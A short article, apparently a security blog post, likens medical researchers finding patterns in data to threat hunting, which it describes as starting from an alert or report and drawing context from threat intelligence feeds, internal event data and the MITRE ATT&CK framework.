Every day we seem to hear of new and interesting linkages discovered by the medical and scientific communities. Just yesterday there was a report that young people who vape are 3.5 times more likely to try or use marijuana, compared to those who don’t. Today, I heard another report on the radio stating if a person can keep their blood pressure in check, especially in middle age, it could lower the risk of developing dementia. Researchers are constantly analyzing data and searching for patterns to identify and solve important problems. Sounds a lot like what we do as security professionals.
Whether investigating an event, engaged in threat hunting or responding to an incident, we search for threads to pull that will lead us to what is happening or has occurred. The process starts with a trigger – an alert or report. Then threat intelligence, which includes global threat feeds, some from commercial sources, some open source, some industry and some from existing security vendors, is used to add context. A critical, but not fully utilized source, is threat and event data from internal systems, including intelligence from attacks you’ve seen or managed. Data from the MITRE ATT&CK framework is another great knowledge base for intelligence on techniques, tactics and indicators. For example, knowing the techniques that APT28 applies, you can look for potential indicators of compromise or possible related system events in your organization and determine if your sensor grid is detecting those techniques.